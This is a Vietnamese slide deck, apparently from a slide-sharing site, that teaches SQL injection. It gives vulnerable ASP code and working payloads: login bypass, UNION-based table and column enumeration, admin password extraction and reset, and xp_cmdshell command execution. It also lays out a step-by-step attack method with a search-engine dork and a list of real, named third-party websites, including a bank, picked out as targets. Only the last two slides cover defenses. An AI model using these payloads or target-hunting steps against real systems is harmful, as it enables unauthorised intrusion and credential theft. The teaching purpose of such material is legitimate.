Ce diaporama a bien été signalé.
Nous utilisons votre profil LinkedIn et vos données d’activité pour vous proposer des publicités personnalisées et pertinentes. Vous pouvez changer vos préférences de publicités à tout moment.

SQL injection

1 712 vues

Publié le

Publié dans : Technologie
 • Identifiez-vous pour voir les commentaires

SQL injection

 1. 1. SQL INJECTION Nội dung trình bày: SQL Injection là gì? Các dạng tấn công bằng SQL Injection Kỹ Thuật tấn công bằng sql injection Cách phòng tránh Demo
 2. 2. SQL Injection là gì?    SQL injection là một kĩ thuật tấn công lợi dụng lỗ hổng trong việc kiểm tra dữ liệu nhập trong các ứng dụng web và các thông báo lỗi của hệ quản trị cơ sở dữ liệu để "tiêm vào" (injection) và thi hành các câu lệnh SQL bất hợp pháp. Hậu quả của nó rất tai hại vì nó cho phép những kẻ tấn công có thể thực hiện các thao tác xóa, hiệu chỉnh, … do có toàn quyền trên cơ sở dữ liệu của ứng dụng, thậm chí là server mà ứng dụng đó đang chạy. Lỗi này thường xảy ra trên các ứng dụng web có dữ liệu được quản lí bằng các hệ quản trị cơ sở dữ liệu như SQL Server, MySQL, Oracle, DB2, Sysbase.
 3. 3. Các dạng tấn công bằng SQL Injection  Có bốn dạng thông thường bao gồm: Vượt qua kiểm tra lúc đăng nhập (authorization bypass)  Sử dụng câu lện SELECT  Sử dụng câu lệnh INSERT  Sử dụng các stored-procedures [2], [3] 
 4. 4. Dạng tấn công vượt qua kiểm tra đăng nhập   Đăng nhập nhờ vào lỗi khi dùng các câu lệnh SQL thao tác trên cơ sở dữ liệu của ứng dụng web. Trong trường hợp này, người ta có thể dùng hai trang, một trang HTML để hiển thị form nhập liệu và một trang ASP dùng để xử lí thông tin nhập từ phía người dùng. Ví dụ:
 5. 5. login.htm <form action="ExecLogin.asp" method="post"> Username: <input type="text" name="fUSRNAME"><br> Password: <input type="password" name="fPASSWORD"><br> <input type="submit"> </form>
 6. 6. execlogin.asp <% Dim vUsrName, vPassword, objRS, strSQL vUsrName = Request.Form("fUSRNAME") vPassword = Request.Form("fPASSWORD") strSQL = "SELECT * FROM T_USERS " & _ "WHERE USR_NAME=' " & vUsrName & _ " ' and USR_PASSWORD=' " & vPassword & " ' “ Set objRS = Server.CreateObject("ADODB.Recordset") objRS.Open strSQL, "DSN=..." If (objRS.EOF) Then Response.Write "Invalid login." Else Response.Write "You are logged in as " & objRS("USR_NAME") End If Set objRS = Nothing %>
 7. 7.    Người dùng nhập chuỗi sau vào trong cả 2 ô nhập liệu username/password của trang login.htm là: ' OR ' ' = ' . Lúc này, câu truy vấn sẽ được gọi thực hiện là: SELECT * FROM T_USERS WHERE USR_NAME ='' OR ''='' and USR_PASSWORD= '' OR ''='' Câu truy vấn này là hợp lệ và sẽ trả về tất cả các bản ghi của T_USERS và đoạn mã tiếp theo xử lí người dùng đăng nhập bất hợp pháp này như là người dùng đăng nhập hợp lệ.
 8. 8. Dạng tấn công sử dụng câu lệnh SELECT   Để thực hiện được kiểu tấn công này, kẻ tấn công phải có khả năng hiểu và lợi dụng các sơ hở trong các thông báo lỗi từ hệ thống để dò tìm các điểm yếu khởi đầu cho việc tấn công. Thông thường, sẽ có một trang nhận ID của tin cần hiển thị rồi sau đó truy vấn nội dung của tin có ID này.
 9. 9. <% Dim vNewsID, objRS, strSQL vNewsID = Request("ID") strSQL = "SELECT * FROM T_NEWS WHERE NEWS_ID =" & vNewsID Set objRS = Server.CreateObject("ADODB.Recordset") objRS.Open strSQL, "DSN=..." Set objRS = Nothing %> 
 10. 10. Câu truy vấn SQL lúc này sẽ trả về tất cả các article từ bảng dữ liệu vì nó sẽ thực hiện câu lệnh: SELECT * FROM T_NEWS WHERE NEWS_ID=0 or 1=1 
 11. 11.    ' UNION SELECT ALL SELECT OtherField FROM OtherTable WHERE ' '=' (*) Lúc này, ngoài câu truy vấn đầu không thành công, chương trình sẽ thực hiện thêm lệnh tiếp theo sau từ khóa UNION nữa. Nếu chúng ta thêm ' UNION SELECT name FROM sysobjects WHERE xtype = 'U' là có thể liệt kê được tên tất cả các bảng dữ liệu.
 12. 12. Dạng tấn công sử dụng câu lệnh INSERT  Chức năng không thể thiếu là sau khi đăng kí thành công, người dùng có thể xem và hiệu chỉnh thông tin của mình. SQL injection có thể được dùng khi hệ thống không kiểm tra tính hợp lệ của thông tin nhập vào.
 13. 13.   Ví dụ, một câu lệnh INSERT có thể có cú pháp dạng: INSERT INTO TableName VALUES('Value One', 'Value Two', 'Value Three'). Nếu đoạn mã xây dựng câu lệnh SQL có dạng : <% strSQL = "INSERT INTO TableName VALUES(' " & strValueOne & " ', ' " _ & strValueTwo & " ', ' " & strValueThree & " ') " Set objRS = Server.CreateObject("ADODB.Recordset") objRS.Open strSQL, "DSN=..." … Set objRS = Nothing %>
 14. 14. Dạng tấn công sử dụng storedprocedures    Việc tấn công bằng stored-procedures sẽ gây tác hại rất lớn nếu ứng dụng được thực thi với quyền quản trị hệ thống 'sa'. Ví dụ, nếu ta thay đoạn mã tiêm vào dạng: ' ; EXEC xp_cmdshell 'cmd.exe dir C: '. Lúc này hệ thống sẽ thực hiện lệnh liệt kê thư mục trên ổ đĩa C: cài đặt server. Việc phá hoại kiểu nào tuỳ thuộc vào câu lệnh đằng sau cmd.exe.
 15. 15. Kỹ Thuật tấn công bằng sql injection       Bước 1: Tìm kiếm mục tiêu. Bước 2: Kiểm tra chỗ yếu của trang web Bước 3: Nhận data qua ‘database using ODBC error message’ Bước 4: Xác định tên của các column trong table Bước 5: Thu thập các dữ liệu quan trọng. Bước 6: Xử lý kết quả tìm được
 16. 16. Tìm kiếm mục tiêu   Bạn có thể dùng các bất kỳ một search-engine nào trên mạng như các trang login, search, feedback… Bạn có thể “custome Search Engine” lại cho phù hợp với yêu cầu của bạn
 17. 17.   Thực hiện câu lệnh search: inurl:php?id= site:com.vn
 18. 18. Đây là kết quả thu được.
 19. 19. Kết Quả Tìm Được Của Nhóm             http://www.vsmc.com.vn/news_detail.php?id=19' http://www.toeic.com.vn/info/details.php?id=383' http://www.phanhoadigi.com.vn/list_product.php? ID=1173&namecate=EOS' http://forum.key.com.vn/viewtopic.php?id=362 http://www.biconsi.com.vn/index.php?id=36' http://www.vietphone.com.vn/download.php?mode=download&id=19' http://thammyvienthanhbinh.com.vn/detail.php?id=19' http://www.voip.com.vn/download.php?mode=download&id=28' http://bidv.com.vn/advert.asp?id=36' http://www.licogi.com.vn/home.asp?ID=234&Langid=2%27 http://www.galilcol.ac.il/page.asp?id=17‘ Ghi chú: không phải trang nào cũng tấn công được
 20. 20. Kiểm tra chỗ yếu của trang web   Bạn có thể điền thêm một số lệnh trên url, hoặc trên các from login, search, hoặc search để phát hiện lỗi. Sau đây là một số cách thêm và phát hiện lỗi của nhóm mình:
 21. 21. Nhận data qua ‘database using ODBC error message’   Đây là bước quan trọng nhất và đòi hỏi nhiều kĩ thuật lẫn sự am hiểu về cơ sở dữ liệu. Table INFORMATION_SCHEMA.COLUMNS chứa tên của tất cả các column trong table. Bạn có thể khai thác như sau: http://vitcon/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SHEMA.COLUMNS WHERE TABLE_NAME=‘admin_login’--
 22. 22. Out put:   Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07’[Microsoft][ODBC SQL Server Driver][SQL Server]ORDER BY items must appear in the select list if the statement contains a UNION operator. /index.asp, line 5
 23. 23. Thu thập các dữ liệu quan trọng    Chúng ta phải xác định được các tên của các table và column quan trọng. Chúng ta có thể lấy login_name đầu tiên trong table “admin_login” như sau: http://vitcon/index.asp?id=10 UNION SELECT TOP 1 login_name From admin_login—
 24. 24.     Bạn dễ dàng nhận ra được admin user đầu tiên có login_name là ‘aaa’. Sau đó dung tên user tìm được để tìm password: http://vitcon/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login _name=‘aaa’— Bây giờ bạn sẽ nhận được password của ‘aaa’ là ‘bbb’.
 25. 25. Xử lý kết quả tìm được     Khi bạn đã có tên của tất cả các column trong table, bạn có thể UPDATE hoặc INSERT một record mới vào table này. Để thay đổi password của ‘aaa’ bạn có thể làm như sau: http://vitcon/index.asp?id=10 ;UPDATE ‘admin_login’ SET ‘password’ =‘ccc’ WHERE login_name=‘aaa’– Hoặc bạn login trực tiếp vào và thực hiện dưới quyền user đó.
 26. 26. Cách phòng tránh   Cần có cơ chế kiểm soát chặt chẽ và giới hạn quyền xử lí dữ liệu đến tài khoản người dùng mà ứng dụng web đang sử dụng. Các ứng dụng thông thường nên tránh dùng đến các quyền như dbo hay sa. Quyền càng bị hạn chế, thiệt hại càng ít.
 27. 27.   Loại bỏ bất kì thông tin kĩ thuật nào chứa trong thông điệp chuyển xuống cho người dùng khi ứng dụng có lỗi. Các thông báo lỗi thông thường tiết lộ các chi tiết kĩ thuật có thể cho phép kẻ tấn công biết được điểm yếu của hệ thống.
 28. 28. DEMO

×